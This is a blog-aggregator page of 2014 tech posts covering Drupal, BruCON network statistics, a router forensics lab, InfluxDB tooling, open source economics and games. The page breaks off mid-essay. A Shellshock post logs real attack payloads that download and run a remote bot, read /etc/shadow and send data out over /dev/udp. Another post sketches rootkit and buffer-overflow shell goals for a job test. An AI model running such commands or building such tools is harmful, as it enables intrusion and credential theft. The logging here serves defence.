01 Oct 2014

Dries Buytaert: Drupal 8 beta 1 released

Topic:
Drupal

Today we announced Drupal 8 beta 1! This key milestone is the work of over 2,300 people who have contributed more than 11,500 committed patches to 15 alpha releases, and especially the 234 contributors who fixed 178 "beta blocker" issues. A massive thank-you to everyone who helped get Drupal 8 beta 1 done.

For more information on the beta, please read the beta 1 release announcement. To read about the new features in Drupal 8, see Drupal.org's Drupal 8 landing page.

Betas are for developers and site builders who are comfortable reporting (and where possible, fixing) their own bugs, and who are prepared to rebuild their test sites from scratch if necessary. Beta releases are not recommended for non-technical users, nor for production websites.

01 Oct 2014 9:21am GMT

30 Sep 2014

Xavier Mertens: BruCON 0x06 Network Review

Once again, here is my quick review of the BruCON network that we deployed for our beloved attendees! Yes, we are glad to take care of your packets during the conference. Nothing changed since the last edition: we deployed the same network in the same venue with the same controls in place. But this year, the biggest change was our brand new wall of sheep…

Let's start with some stats! Our Internet bandwidth was the same as last year: a 100 Mbits wireless link. This was enough, as we had peaks of up to 80 Mbits of traffic. Alas, our partner that provides the Internet pipe is still not ready to deliver IPv6.

Traffic Overview

We provided two networks: a "public" one for the visitors and a "private" one for the crew and the speakers, which is not sniffed. The Wi-Fi network is the most used, but more and more people decided to stick to 3G/4G connectivity to avoid connecting to the wild network. We detected 334 unique MAC addresses that requested an IP address during the conference. The split across the different client types is shown below.

As for the applications used, HTTP remains in first position, which is not a surprise. While HTTP remains the top protocol, SSL and OpenVPN came in 2nd and 3rd position, which means that people also tend to use encrypted communications.

DNS is always a goldmine. Here is a top 20 of the requests that we captured (based on DNS traffic, whichever DNS servers were used!). To clean up the mess, I removed the PTR requests.

Count Query
28847 google
25334 a.t
19089 google.com
11895 wpad
9113 t.co
5738 brucon
5487 brucon.org
4917 apple.com
4102 ey.net
3956 pentesteracademy
3733 appspot.l.google.com
3697 pentesteracademylab.appspot.com
3434 printer
3314 facebook.com
3158 amazon.com
2773 images.amazon.com
2752 ecx.images-amazon.com
2730 twitter.com
2520 ssl
2422 clients.l.google.com
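
For reference, a ranking like this can be rebuilt offline from a packet capture with a few lines of Python. Below is a minimal sketch using scapy; the capture file name is made up and this is not the exact tooling used during the conference:

#!/usr/bin/env python
# Count DNS query names in a pcap, skipping PTR (reverse) lookups.
from collections import Counter
from scapy.all import rdpcap, DNS, DNSQR

counter = Counter()
for pkt in rdpcap("brucon-dns.pcap"):  # hypothetical capture file
    if pkt.haslayer(DNS) and pkt[DNS].qr == 0 and pkt.haslayer(DNSQR):
        query = pkt[DNSQR]
        if query.qtype == 12:          # qtype 12 = PTR, skip reverse lookups
            continue
        name = query.qname
        if isinstance(name, bytes):
            name = name.decode("ascii", "replace")
        counter[name.rstrip(".")] += 1

for name, count in counter.most_common(20):
    print("%6d %s" % (count, name))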

Personally, next year I'd like to create some honeypots to redirect the traffic sent to hosts like "wpad" (Web Proxy Autodiscovery Protocol) or "printer" ;-). We provided a DNS server via DHCP, but many people had fixed DNS servers configured. Funny enough, a lot of them were RFC1918 IP addresses not used on the BruCON network. Corporate servers?

Count DNS Server
131815 10.4.0.1 (BruCON official DNS)
73294 224.0.0.251
32559 ff02::fb
14887 224.0.0.252
13939 ff02::1:3
6544 8.8.8.8 (Google)
2294 172.246.84.42
883 8.8.4.4 (Google)
565 86.39.202.67
500 208.67.222.222 (OpenDNS)

We detected network flows to ~25K unique hosts around the world, mainly in Europe and the United States.

Connections Map

It's also interesting to search for errors or "weird" traffic. Here is the top-20 of problems/suspicious traffic detected by Bro:

Count Suspicious Behavior
7891 dns_unmatched_msg
3578 dns_unmatched_reply
1607 data_before_established
1456 unmatched_HTTP_reply
1342 possible_split_routing
1017 unescaped_special_URI_char
1015 window_recision
884 line_terminated_with_single_CR
811 above_hole_data_without_any_acks
734 TCP_ack_underflow_or_misorder
453 unknown_packet_type
350 dns_unmatched_msg_quantity
294 DNS_Conn_count_too_large
284 TCP_seq_underflow_or_misorder
270 unknown_protocol_2
210 zero_length_ICMPv6_ND_option
178 non_ip_packet_in_egre
177 bad_HTTP_request
173 connection_originator_SYN_ack
169 inflate_failed

We also provided a Tor SOCKS proxy to the visitors but it was not heavily used… Maybe we should promote it more next year? But the brand new wall of sheep was a great success. It is a modified version of Dofler and offers the following features:

Displaying pictures on the fly is dangerous when hackers are the primary audience. That's why I implemented a skin-color detection filter to prevent most of the p0rn images from being displayed on the wall of sheep. Of course, it quickly became a new game for some attendees who tried to display all kinds of (not only p0rn) pictures. Most of the time they succeeded, but the filter nevertheless worked quite well. Check the two following impressive numbers:

As for the captured accounts, even if people are more aware and are trying to protect themselves, we still collected 242 accounts:
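
Back to the skin-color filter for a moment: for the curious, the idea boils down to measuring the ratio of skin-toned pixels in each captured image. Here is a minimal OpenCV sketch of that idea; the thresholds are rough guesses and this is not the code actually running on the wall of sheep:

import cv2
import numpy as np

def looks_like_skin(path, max_ratio=0.3):
    # Return True when more than max_ratio of the pixels fall in a rough skin-tone range.
    img = cv2.imread(path)
    if img is None:
        return False
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    # Very rough skin-tone range in HSV; tune these values on real traffic.
    mask = cv2.inRange(hsv, np.array([0, 48, 80]), np.array([20, 255, 255]))
    ratio = cv2.countNonZero(mask) / float(img.shape[0] * img.shape[1])
    return ratio > max_ratio

# The wall of sheep would then simply drop any image for which
# looks_like_skin() returns True instead of displaying it.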

That's all for my wrap-up!

30 Sep 2014 7:06pm GMT

Frank Goossens: Amazed by Autoptimize take-up

Less than a year after reaching 100,000 downloads, Autoptimize broke the 200,000 barrier just last week.

It's also exciting to see how people are blogging (or tweeting) about it as well;

So yeah, I'm pretty amazed by how well Autoptimize is doing. Thanks for the confidence!

30 Sep 2014 6:46pm GMT

Xavier Mertens: Online Router Forensics Lab

When my friend Didier Stevens contacted me last year to help him with a BruCON 5×5 project, I simply could not decline! Didier developed a framework to perform forensic investigations on Cisco routers. His framework is called NAFT ("Network Appliance Forensic Toolkit"). It is written in Python and provides a good toolbox to extract juicy information from router memory. From a development point of view, the framework was ready, but Didier had the great idea to prepare a workshop to train students to analyze router memory images. The 5×5 project was accepted and, thanks to the support of BruCON, it was possible to buy a bunch of Cisco routers to let students play with them. Why hardware routers and not simply a virtual lab (after all, we are living in the virtualisation era)? For two main reasons: to avoid licensing issues, and because a virtual lab does not offer the ROMMON feature, which is very useful for taking a memory image of the router. The very first workshop was given last week during BruCON. With a fully booked room of 40 people, it was a success and we already got good feedback. But not all people are able to attend security conferences and workshops, and that's why Didier had the idea to implement an online lab where registered people could perform the same investigations as in the live workshop. That's where I got involved in the project!

Here are a few words about the lab that has been deployed. It is based on a hardened Linux server and two Cisco 2610 routers connected together. A private network is available to generate some IP traffic, and the routers' serial consoles are also connected. Here is a small schema of the lab:

NAFT Lab Topology

The Cisco routers can be managed via a telnet connection or via their console port. All the tools needed to perform the memory dump analysis are pre-installed:

To access the lab, you just need an SSH client.

The lab is available to anybody who would like to test Didier's framework. We also opened a website with information about the project and a booking system. You just have to select the day(s) and fill in a small form. Once approved, a temporary account will be created and the credentials will be sent to you.

Presented as an exclusive during BruCON, Didier and I are happy to announce that the lab is publicly available right now via router-forensics.net. If you're interested in a workshop for your school or your event, feel free to contact us! We have routers ready to hit the road ;-) The next workshop is scheduled during Hack.lu in Luxembourg.

Routers on the Road

30 Sep 2014 2:38pm GMT

Dieter Plaetinck: A real whisper-to-InfluxDB program.

The whisper-to-influxdb migration script I posted earlier is pretty bad: a shell script, without concurrency, and with an undiagnosed performance issue. I hinted that one could write a Go program using the unofficial whisper-go bindings and the influxdb Go client library. That's what I've done now; it's at github.com/vimeo/whisper-to-influxdb. It uses configurable numbers of workers for both whisper fetches and InfluxDB commits, but it's still a bit naive in the sense that it commits to InfluxDB one series at a time, irrespective of how many records are in it. My series, and hence my commits, have at most 60k records, and presumably InfluxDB could handle a lot more per commit, so we might leverage better batching later. Either way, I can now consistently commit about 100k series every 2.5 hours (or ~10/s), where each series has a few thousand points on average, with peaks up to 60k points. I usually play with 1 to 30 InfluxDB workers. Even though I've hit a few InfluxDB issues, this tool has enabled me to fill in gaps after outages and to do a restore from whisper after a complete database wipe.
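
For illustration only, the fetch/commit worker-pool idea can be sketched in a few lines of Python; the real tool is the Go program linked above, and the path list and the commit stub below are placeholders:

#!/usr/bin/env python
# Sketch: a pool of workers reads whisper files while another pool commits
# the resulting series.
import os
import time
import whisper                                   # the graphite whisper library
from concurrent.futures import ThreadPoolExecutor, as_completed

def read_series(path):
    (start, end, step), values = whisper.fetch(path, 0, time.time())
    points = [(start + i * step, v) for i, v in enumerate(values) if v is not None]
    return os.path.splitext(os.path.basename(path))[0], points

def commit_series(name, points):
    # Replace this stub with a real InfluxDB write; the payload format
    # depends on your InfluxDB version and client library.
    print("would commit %d points to series %s" % (len(points), name))

paths = ["/var/lib/carbon/whisper/example.wsp"]  # hypothetical whisper files
with ThreadPoolExecutor(max_workers=10) as writers, \
     ThreadPoolExecutor(max_workers=10) as readers:
    futures = [readers.submit(read_series, p) for p in paths]
    for future in as_completed(futures):
        name, points = future.result()
        writers.submit(commit_series, name, points)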

30 Sep 2014 12:37pm GMT

Dries Buytaert: Scaling Open Source communities

Topic:
Drupal

We truly live in miraculous times. Open Source is at the core of the largest organizations in the world. Open Source is changing lives in emerging countries. Open Source has changed the tide of governments around the world. And yet, Open Source can be really difficult. Open Source can be largely a thankless job. It is hard to find volunteers, it is hard to find organizations to donate time or money, it is hard to organize the community, it is hard to learn, it is hard to attract full-time contributors, and more. As the project lead for Drupal, one of the largest Open Source projects/communities in the world, I live these challenges every day. In this blog post, I will analyze the challenge of scaling Open Source communities and recommend a solution for building very large Open Source communities.

Open Source projects are public goods

In economic terms, for something to be a "public good", it needs to match two criteria:

  1. non-excludability - it is impossible to prevent anyone from consuming that good, and
  2. non-rivalry - consumption of this good by anyone does not reduce the benefits available to others.

Examples of public goods include street lighting, national defense, public parks, basic education, the road system, etc. By that definition, Open Source software is also a "public good": we can't stop anyone from using Open Source software, and one person benefiting from Open Source software does not reduce the benefits available to others.

The realization that Open Source is a public good is a helpful one because there has been a lot of research about how to maintain and scale public goods.

Public goods and the free-rider problem

The biggest problem with public goods is the "free rider problem". A free rider is someone who uses a public good but who does not pay anything (or pay enough) towards its cost or production. If the maintainers of a public good do not address the free-rider problem it can lead to the non-production or under-production of a public good. This is generally known as the "Tragedy of the Commons".

In Open Source, a free-rider is someone who uses an Open Source software project without contributing to it. If too few people or organizations contribute to the project, the project can become unhealthy, and ultimately could cease to exist.

The free-rider problem is typical for public goods and does not usually arise with private businesses. For example, community-maintained software like Drupal may have many free riders but proprietary competitors like Adobe or Sitecore have no problem excluding those who will not pay a license fee.

To properly understand the free-rider problem and public good provision, we need to understand both self-interest theory and the theory of collective action. I'll discuss both theories and apply them to Open Source.

Self-interest theory

Open Source contributors do amazing things. They contribute to fixing the hardest problems, they volunteer to help others, they share their expertise, and more. Actions like these are often described as altruistic, in contrast to the pursuit of self-interest. In reality, generosity is often driven by some level of self-interest: we provide values to others only on terms that benefit ourselves.

Many reasons exist why people contribute to Open Source projects; people contribute because they enjoy being part of a community of like-minded people, to hone their technical skills, to get recognition, to try and make a difference in the world, because they are paid to, or for different forms of "social capital". Often we contribute because by improving the world we are living in, we are making our world better too.

Modern economics suggest that both individuals and organizations tend to act in their own self-interest, bound by morals, ethics, the well-being of future generations and more. The theory of self-interest goes back to the writings of the old Greeks, is championed by early modern economists, and is still being adhered to by late-modern economists. It follows from the theory of self-interest that we'd see more individuals and organizations contribute if they received more benefits.

While contributing to Open Source clearly has benefits, it is not obvious if the benefits outweigh the cost. If we can increase the benefits, there is no doubt we can attract more contributors.

Collective action theory

The theory of self-interest also applies to groups of individuals. In his seminal work on collective action and public goods, economist Mancur Olson shows that the incentive for group action diminishes as group size increases. Large groups are less able to act in their common interest than small ones because (1) the complexity increases and (2) the benefits diminish.

We see this first hand in Open Source projects. As an Open Source project grows, aspects of the development, maintenance and operation have to be transferred from volunteers to paid workers. Linux is a good example. Without Red Hat, IBM and Dell employing full-time Linux contributors, Linux might not have the strong market share it has today.

The concept of major public goods growing out of volunteer and community-based models is not new to the world. The first trade routes were ancient trackways, which citizens later developed on their own into roads suited for wheeled vehicles in order to improve commerce. Transportation was improved for all citizens, driven by the commercial interest of some. Today, we certainly appreciate that full-time government workers maintain the roads. Ditto for the national defense system, basic education, etc.

The theory of collective action also implies that as an Open Source project grows, we need to evolve how we incent contributors or we won't be able to attract either part-time volunteers or full-time paid contributors.

Selective benefits

Solutions for the free-rider problem and collective action problem exist, and this is where Open Source can learn from public goods theory and research. The most common solution for the free-rider problem is taxation; the government mandates all citizens to help pay for the production of the public good. Taxpayers help pay for our basic education system, the road system and national defense for example. Other solutions are privatization, civic duty or legislation. These solutions don't apply to Open Source.

I believe the most promising solution for Open Source is known as "privileged groups". Privileged groups are those who receive "selective benefits". Selective benefits are benefits that can motivate participation because they are available only to those who participate. The study of collective action shows that public goods are still produced when a privileged group benefits more from the public good than it costs them to produce it.

In fact, prominent "privileged groups" examples exist in the Open Source community; Automattic is a privileged group in the WordPress community as it is in a unique position to make many millions of dollars from WordPress.com. Mozilla Corporation, the for-profit subsidiary of the Mozilla Foundation, is a privileged group as it is in a unique position to get paid millions of dollars by Google. As a result, both Automattic and Mozilla Corporation are willing to make significant engineering investments in WordPress and Mozilla, respectively. Millions of people in the world benefit from that every day.

Drupal is different from Automattic and Mozilla in that no single organization benefits uniquely from contributing. For example, my company Acquia currently employs the most full-time contributors to Drupal but does not receive any exclusive benefits in terms of monetizing Drupal. While Acquia does accrue some value from hiring the Drupal contributors that it does, this is something any company can do.

Better incentives for Drupal contributors

It's my belief that we should embrace the concept of "privileged groups" and "selective benefits" in the Drupal community to help us grow and maintain the Drupal project. Furthermore, I believe we should provide "selective benefits" in a way that encourages fairness and equality, and doesn't primarily benefit any one particular organization.

From the theory of self-interest it follows that to get more paid core contributors we need to provide more and better benefits to organizations that are willing to let their employees contribute. Drupal agencies are looking for two things: customers and Drupal talent.

Many organizations would be eager to contribute more if, in return, they were able to attract more customers and/or Drupal talent. Hence, the "selective benefits" that we can provide them are things like:

  • Organizational profile pages on drupal.org with badges or statistics that prominently showcase their contributions,
  • Advertising on drupal.org in exchange for fixing critical bugs in Drupal 8 (imagine we rewarded each company that helped fix a critical Drupal 8 bug with 10,000 ad views on the front page of drupal.org),
  • Better visibility on Drupal.org's job board for those trying to hire Drupal developers,
  • The ability to sort the marketplace by contributions, rather than just alphabetically
  • ...

I'm particularly excited about providing ads in exchange for contributing. Contributing to Drupal now becomes a marketing expense; the more you contribute, the more customers you can gain from drupal.org. We can even direct resources: award more ad views for fixing UX problems early in the development cycle, and for fixing critical bugs and beta blockers later in the development cycle. With some relatively small changes to drupal.org, hiring a full-time core developer becomes a lot more interesting.

By matching the benefits to the needs of Drupal agencies, we can direct more resources towards Drupal development. I also believe this system to be fair; all companies can choose to contribute to Drupal 8 and earn advertising credits, and all participants are rewarded equally. We can turn Drupal.org into a platform that encourages and directs participation from a large number of organizations.

Systems like this are subject to gaming but I believe these challenges can be overcome. Any benefit is better than almost no benefit. In general, it will be interesting to see if fairness and heterogeneity will facilitate or impede contribution compared to Open Source projects like WordPress and Mozilla, where some hold unique benefits. I believe that if all participants benefit equally from their contributions, they have an incentive to match each other's contributions and it will facilitate the agreement and establishment of a contribution norm that fosters both cooperation and coordination, while minimizing gaming of the system. In contrast, when participants benefit very differently, like with WordPress and Mozilla, this decreases the willingness to cooperate, which, in turn, could have detrimental effects on contributions. While not necessarily the easiest path, I believe that making the system fair and heterogeneous is the "Drupal way" and that it will serve us in the long term.

Conclusions

There are plenty of technical challenges ahead of us that we need to work on, fun ideas that we should experiment with, and more. With some relatively small changes, we could drastically change the benefits of contributing to Drupal. Better incentives mean more contributors, and more contributors mean that we can try more things and do things better and faster. It means we can scale Drupal development to new heights and with that, increase Open Source's impact on the world.

30 Sep 2014 9:47am GMT

Philip Van Hoof: nrl:maxCardinality one-to-many ontology changes

I added support for changing the nrl:maxCardinality property of an rdfs:Property from one to many. Earlier, Martyn Russell reverted such an ontology change as this was a blocker for the Debian packaging by Michael Biebl.

We only support going from one to many. That's because going from many to one would obviously imply data loss (a string list could work with CSV, but an int list can't be stored as CSV in a single-value int type; instead of trying to support nonsense, I decided to just not do it at all).

More supported ontology changes can be found here.

Not sure if people care but this stuff was made while listening to Infected Mushroom.

30 Sep 2014 12:12am GMT

29 Sep 2014

Philip Van Hoof: Protect us against eavesdropping; only eavesdrop yourself within a legal framework

The government should protect our citizens against eavesdropping. The government can and may eavesdrop itself, but it can and may only do so within a legal framework.

All sorts of things show that governments within the NATO alliance are attacking our country with digital break-ins. It worries me.

Technically, this means to me that our country must invest in securing its systems. That includes knowledge of, and control over, hardware and software at a deep level.

I hope that Pieter De Crem invests not only in fighter jets but also in securing the country's computer systems.

To me that means knowledge and control at the level of the bootloader, the kernel and the hardware. After all, the government's systems contain an enormous amount of citizens' data, while the army's systems provide information about, and access to, equipment that guarantees the security and the peace of the country.

As far as the kernel is concerned, a recruit should work through Robert Love's book in the days before the job interview. He or she must be able to write a kernel module with the Internet as a help. That is a minimum.

A good technical test would be to write your own rootkit kernel module during the days over which the job interview takes place (yes, days). A few objectives could be set for this, for example: hiding the .ko file on the filesystem that was previously loaded with insmod, copying all outgoing TCP/IP data to a hidden piece of hardware, and so on.

The latter without consuming much of the host's memory, since the hidden piece of hardware will presumably be slower than the normal network interface (eth0 versus, say, 3G). One solution could be to filter, combined with occasionally causing some packet loss by making hidden netif_stop_queue and netif_wake_queue calls on the normal network interface. Maybe the recruit has better ideas that are hard or impossible to detect? I hope so!

The recruit must provide a way (one that is not obvious) to receive commands, preferably one that is hard to detect. Perhaps using radio in such a way that it is difficult to detect? I am curious.

The more of these kinds of objectives are met, the more suitable the candidate.

As far as userland is concerned, a recruit must, given a piece of code containing a typical buffer overflow bug, be able to recognize that buffer overflow. But give your recruit time and a relaxed atmosphere, because under stress only the lucky ones spot something like that now and then. Reviewing (good) code is something that takes many years of experience (bad code is easier, but today's security problems are not about the world's bad code, such as dnsmasq; they are about, for example, OpenSSL and Bash).

The follow-up question could be to have injected code executed by means of that buffer overflow. The Internet may be used to find all the answers. Extra points when the executed code, with or without netcat, makes the whole thing available on a TCP/IP port.

The service could, for example, be a socket server that has a buffer overflow on the buffer passed to read(). Even a junior C developer should recognize that.

These kinds of tests are needed because only those who technically know (and can implement) how to hide themselves after a break-in are suited to defend the country against the NSA and GCHQ.

I am convinced that those who can do this have a reasonably good moral compass: people with that kind of insight have capabilities, and such people therefore often also have a well-considered moral compass. As long as the government follows its own moral compass, these people are willing to put their abilities at the government's service.

The army colonel should realize that the average programmer really just wants to understand technology thoroughly. That this technology happens to be used for bombs as well is not the programmers' fault. That the colonel's communication technology is full of bugs does not make the programmers who find those bugs criminals. The colonel had better pray to Thor that the country's programmers find them before the real enemy does.

But the law stands above the military. It must be followed, also by the intelligence services. It is our only guarantee of a free society: I do not want to work on, or to have helped build, a world in which citizens lose freedoms such as privacy through technology.

Kind regards,

Philip. Programmer.

29 Sep 2014 11:45pm GMT

Xavier Mertens: Some Personal Shellshock Stats

In April 2014, the Internet shivered when we faced the "heartbleed" bug in the OpenSSL library. It made a lot of noise across the security community and was even covered by mainstream media. Such an issue could never happen again, right?

Never say never! Last week, a new storm hit the Internet with "shellshock", better known as CVE-2014-6271! This new bug affects the bash UNIX shell. The difference with heartbleed? When you compare them, heartbleed definitely loses its pole position in the top threats. Shellshock is very easy to exploit and it affects MANY applications or services that spawn other processes using calls like system() in PHP or the well-known mod_cgi provided by Apache. Not only public websites can be affected but also some critical services like:

So, any service in which the environment is defined via a bash shell execution. If you need more info about this new threat, google for it!

Some security researchers and bloggers immediately started to scan the Internet to get a better idea of the impact of this vulnerability on public services. Of course, bad guys also started to do the same and my server was hit several times (94). So far, I have detected the following IP addresses:

109.80.232.48
109.95.210.196
119.82.75.205
128.199.223.129
128.204.199.209
166.78.61.142
176.10.107.180
178.32.181.108
2001:4800:7812:514:1b50:2e05:ff04:c849:52116
209.126.230.72
24.251.197.244
54.251.83.67
62.210.75.170
79.99.187.98
80.110.67.10
83.166.234.133
89.207.135.125
89.248.172.139
93.103.21.231

Here is a list of commands/scripts tested:

/bin/ping -c 1 198.101.206.138
/bin/bash -c "echo testing9123123"; /bin/uname -a
/sbin/ifconfig
/bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
echo -e "Content-Type: text/plain\\n"; echo qQQQQQq
/bin/cat /etc/shadow
echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444
/bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=rootshell.be -O /tmp/a.pl"
/bin/bash -c "wget -q -O /dev/null http://ad.dipad.biz/test/http://leakedin.com/"
/bin/bash -c "wget -U BashNslash.http://www.leakedin.com/tag/urls-list/page/97/ 89.248.172.139"
wget 'http://taxiairportpop.com/s.php?s=http://brucon.org/'
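
For what it's worth, collecting the attacking IP addresses and payloads above is mostly a matter of grepping web server logs for the telltale "() {" marker of CVE-2014-6271. A minimal Python sketch, assuming the default Apache combined log format (the log path is just an example):

#!/usr/bin/env python
# Pull shellshock probes out of an Apache access log: count hits per source IP
# and collect the distinct payloads.
import re
from collections import Counter

hits = Counter()
payloads = set()
with open("/var/log/apache2/access.log") as logfile:
    for line in logfile:
        if "() {" not in line:
            continue
        hits[line.split()[0]] += 1            # first field = client IP
        match = re.search(r"\(\) \{.*", line)
        if match:
            payloads.add(match.group(0))

for ip, count in hits.most_common():
    print("%4d %s" % (count, ip))
for payload in sorted(payloads):
    print(payload)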

Personally, I like the one which tries to use the built-in support for sockets via pseudo files like "/dev/[tcp|udp]/<host>/<port>". This is a nice feature of bash but it is disabled on most distributions (precisely for security reasons).

29 Sep 2014 6:59pm GMT

Joram Barrez: Webinar ‘Process Driven Spring Applications with Activiti’ now on Youtube

As I mentioned, I did a webinar on Spring Boot + Activiti last week (at 6 am …. yes, it hurt) with my good pal Josh Long. If you missed it, or want to see the awesomeness again, here's the recording: On a similar note, the webinar that Josh did before this one, on Spring […]

29 Sep 2014 10:46am GMT

27 Sep 2014

Damien Sandras: GNOME 3 and HIG Love

I am making progress on the next Ekiga release. I have spent the last few months of spare time working on the user interface. The purpose is to adapt the UI and use the great GTK+3 features when adequate. There is still much left to do, but here are before and after screenshots. Stay tuned […]

27 Sep 2014 4:56pm GMT

25 Sep 2014

Frank Goossens: Music from Our Tube; Benjamin Booker’s Violent Shiver

"Violent Shiver" was Benjamin Booker's very first single. And it's an impressive one, as far as one-song-debuts go. This is a live version recorded for WFUV.

Watch this video on YouTube or on Easy Youtube.

25 Sep 2014 11:09pm GMT

24 Sep 2014

Frank Goossens: The Broken Smartphone Breakdown

I'm a spoiled, clumsy brat. Spoiled because my (previous) employer hands out yearly vouchers, which I use to buy myself a new top-notch smartphone every 2-3 years. And clumsy because I all too often lose or break those expensive gadgets, forcing me to look for cheaper replacements. So here's the breakdown of my smartphone history:

  1. 2009: HTC Hero: my first smartphone (although I wasn't complaining about that 2nd hand Nokia e61i). I lost it on the train a year and a half after buying it
  2. 2011: Acer beTouch e110: cheap replacement for the HTC Hero, only used it for a couple of weeks before selling it because it was a horrible excuse of a smartphone.
  3. 2011: HTC Magic: 2nd hand replacement, it was a great little handset once it was flashed with Cyanogenmod. I sold it for my next new phone, the …
  4. 2011: Samsung Galaxy SII: Had a great time with that Sammy, lots of upgrades & tweaks, but I did need to have it repaired within a year of buying it, after it fell out of my pocket when getting off the train.
  5. 2012: Samsung Omnia 7: My first encounter with the Windows Phone Metro interface as a temporary device, while the SII was getting fixed.
  6. 2012: Samsung Galaxy SII: back from repairs and was very happy with it, but a year after that it broke down again.
  7. 2013: HTC Radar: temporary replacement for the SII, Windows Phone again.
  8. 2013: Samsung Galaxy S4: A brand new handset which I dropped approx. a year after buying it. Not really a huge leap forward compared to the SII, but I did love the speed improvements 4G offered.
  9. 2014: Samsung Galaxy Gio: temporary replacement for the broken S4. But despite the fact that I got my main apps up and running (incl. Firefox Mobile), the old version of Android (2.3.6), the small screen and a serious lack of memory made it clear this was not a permanent replacement.
  10. 2014: Google Galaxy Nexus; 2nd hand replacement (bought yesterday, a steal for only €95) with Cyanogenmod 11. Early days, but I just might try not to drop it, I'm loving it already. The only thing I really miss is 4G support, because, after all, I am a spoiled brat.

24 Sep 2014 3:07pm GMT

Dieter Plaetinck: InfluxDB as a graphite backend, part 2

The Graphite + InfluxDB series continues.

  • In part 1, "On Graphite, Whisper and InfluxDB", I described the problems of Graphite's whisper and ceres, why I disagree with common graphite clustering advice as being the right path forward, what a great timeseries storage system would mean to me, why InfluxDB (despite being the youngest project) is my main interest right now, and introduced my approach for combining both and leveraging their respective strengths: InfluxDB as an ingestion and storage backend (and at some point, realtime processing and pub-sub) and graphite for its renowned data processing-on-retrieval functionality. Furthermore, I introduced some tooling: carbon-relay-ng to easily route streams of carbon data, i.e. metrics datapoints (a minimal example of the carbon line protocol follows after this list), allowing me to send production data to Carbon+whisper as well as InfluxDB in parallel, and graphite-api, the simpler Graphite API server, with graphite-influxdb to fetch data from InfluxDB.
  • Not Graphite related, but I wrote influx-cli which I introduced here. It lets you easily interface with InfluxDB and measure the duration of operations, which will become useful for this article.
  • In the Graphite & Influxdb intermezzo I shared a script to import whisper data into InfluxDB and noted some write performance issues I was seeing, but the better part of the article described the various improvements done to carbon-relay-ng, which is becoming an increasingly versatile and useful tool.
  • In part 2, which you are reading now, I'm going to describe recent progress, share more info about my setup, testing results, state of affairs, and ideas for future work
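
As a side note for readers new to this stack: the "carbon data" mentioned above is just the plaintext line protocol, one "metric.path value unix_timestamp" line per datapoint over TCP. A minimal Python sketch (host and port are assumptions; 2003 is merely the conventional carbon listener port):

#!/usr/bin/env python
# Send one datapoint to a carbon/carbon-relay-ng line receiver.
import socket
import time

sock = socket.create_connection(("localhost", 2003))
sock.sendall(("test.metric 42 %d\n" % int(time.time())).encode("ascii"))
sock.close()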

read more

24 Sep 2014 11:56am GMT

21 Sep 2014

Steven Wittens: The Cargo Cult of Game Mechanics

Form without Function

There's been a lot of fuss about gaming and gaming culture lately, in particular the nature of gaming journalism. Don't worry, I'm so not sticking my face into that particular beehive. However, I do agree the conversation around gaming is crap, so instead I'm posting the kind of opinion piece I wish I'd see on credible gaming sites, as someone who actually knows how the sausage is made.

Dear Esther

But is it Art?

Gamers like to talk, or argue, about graphics, frame rates, physics, hours of play time, item variety, models, textures, downloadable content and microtransactions, and so on. There is a reason the Glorious PC Master Race and the Console Wars are memes. If games are art, if it's a grown-up medium, why do we fuss about trivialities so much? You don't debate high literature by critiquing the paper stock or chapter length.

Well, because production values are important for immersion. Details and performance really matter. However, when we treat games just as mechanical live pictures, we're missing the point entirely. It's confusing form with function. In The Dark Knight, Heath Ledger's Joker should look the part, but he'll be 10x scarier and more interesting once you understand how he operates and thinks. This seems obvious in film, yet not in gaming.

Even "artistic games" like Dear Esther are often criticized for superficial mechanics (or lack thereof), not for what they set out to do. The question isn't whether Dear Esther is just a walking simulator. It's whether it's anywhere near as engaging as walking around a real place, like a park or a museum. If it fails, it's not because there aren't any puzzles. The Anne Frank House in Amsterdam does not require puzzles. It does have a secret passage but the only achievement you get for finding it is sadness.

Yup, that awkward pause is where the "gaming as a serious medium" debate usually hangs, and it leaves the conversation severely deadlocked. Trying to add gamified elements for the heck of it, to make a gamier game, rings hollow and does not get us any closer to credibility.

Heavy Rain

The popular alternative is to simply adopt the current forms of Serious Media. To make a game more like a movie or a book, whether blockbuster or arthouse. It generally involves taking away choice, using scripts instead of simulations, with mini-games and quick-time events thrown in to amuse your hindbrain. It's tacitly saying that real storytelling, real human comedy or tragedy, can't happen while a player is in control. It's nonsense of course; plenty of games have done so before.

Somehow though we've forgotten how to do it, and I don't think I'm alone in thinking this. This existential crisis was perfectly embodied in indie gem The Stanley Parable, a post-modern tale of choice. It's a game about playing a game, constantly breaking the fourth wall. There's recursive gags, self-parodying achievements, 'victory' conditions that require you to quit the game, and other surgical strikes at typical gaming habits. It garnered critical praise from gamers and journalists alike, playing like a love-hate letter to its audience: at times cooperative and happy, other times sardonic and sadistic.

The Stanley Parable

I'm pretty sure The Stanley Parable is Art. There's just one thing bothering me. It doesn't actually offer you any choice. The game is an admission of defeat.

Choice is of course a tricky concept, that was the whole point, so let me be more specific. You could feasibly make a 100% Let's Play of Stanley Parable, covering all the branching paths, and turn it into a sort of Dragon's Lair on Laserdisc. It would lose little in translation, most of the gags would still work. It's not a game about your choices, it's still just about watching theirs.

Live in Your World, Play in Ours

If you're looking for someone to blame (you know, in general), it's easy to point to the incestuous industry. Games are big business and cost a ton to produce. The primary purpose of talking about games is to sell things to gamers, in a market that moves very fast, saturated with product. Hence brands and franchises compete over the attention of customers, preferably through lock-in. It goes beyond ordinary sales, and includes pre-orders, season passes, virtual marketplaces and other monetary aids. Be sure to use a condom.

For several years now though, there has been a counterpoint: the wave of DRM-free indies, Humble Bundles and the wild success of Kickstarter. Notably, industry veterans Tim Schafer and Brian Fargo, known for beloved classics like Monkey Island and Wasteland, each held out their hats and promised to bring back the glory days of old. Gamers rewarded them in spades. Budgets ballooned from a few hundred thousand to several million, spawning further spinoffs. Chris Roberts of Wing Commander fame did even better. He kickstarted Star Citizen to the tune of a few million, but continues to raise funds today with virtual goods and perks for the future game. It now exceeds $50 million in backer funding.

Typical game ad
Destiny vs Star Citizen

